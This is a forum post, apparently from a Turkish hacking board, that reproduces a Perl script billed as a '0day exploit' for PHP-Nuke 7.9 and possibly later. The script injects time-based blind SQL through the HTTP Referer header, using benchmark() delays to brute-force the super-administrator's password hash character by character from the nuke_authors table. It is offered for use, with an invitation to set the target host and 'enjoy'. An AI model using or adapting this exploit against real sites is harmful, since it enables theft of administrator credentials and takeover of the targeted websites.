hacked MASTER
Mesaj Sayısı : 199 Kayıt tarihi : 08/03/08
| Konu: php nuke 4 exploıt Salı Mart 11, 2008 12:25 am | |
| #!/usr/bin/perl
#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)
#By Rossi46GO www.hackingz0ne.altervista.org
#Chiudere tutti i programmi che possono occupare banda #kill all the programs that can slow down the connection
#Modificare la variabile HOST e divertitevi #modify the variable HOST and enjoy
use strict; use warnings; use LWP; use Time::HiRes; use IO::Socket;
my $host = "http://127.0.0.1/index.php";
my $useragent = LWP::UserAgent->new; my $metodo = HTTP::Request->new(GET => $host);
my $referer; my $inizio; my $risposta; my $fine; my $tempodefault; my $tempo; my $i; my $j; my $hash; my @array;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2);
$referer="http://www.avantolazio.com"; $tempodefault=richiesta($referer); $hash="";
#QUERY RISULTANTE #INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200 000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*')
for ($i=1;$i<33;$i++) { for ($j=0;$j<16;$j++) { $referer="http://www.avantilazio.com'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*"; $tempo=richiesta($referer); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); if($tempo>9) { $tempo=richiesta($referer); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); if($tempo>9) { $hash .=chr($array[$j]); aggiorna($host,$tempodefault,$j,$hash,$tempo,$i); $j=200; } }
} if($i==1) { if($hash eq "") { $i=200; print "Attacco Fallito Sito Fixato\n"; } } }
print "Attacco Terminato\n\n";
system("pause");
sub richiesta{ $referer=$_[0]; $metodo->referrer($referer); $inizio=Time::HiRes::time(); $risposta=$useragent->request($metodo); $risposta->is_success or die "$host : ",$risposta->message,"\n"; $fine=Time::HiRes::time(); $tempo=$fine-$inizio; return $tempo }
sub aggiorna{ system("cls"); @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2); print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0) Thx KingOfSka\n"; print "Visit www.Hackingz0ne.altervista.org\n\n"; print "Sito Vittima : " . $_[0] . "\n"; print "Tempo Default : " . $_[1] . " secondi\n"; print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n"; print "Bruteforcing n carattere Hash : " . $_[5] . "\n"; print "Tempo sql : " . $_[4] . " secondi\n"; print "Hash : " . $_[3] . "\n"; | |
|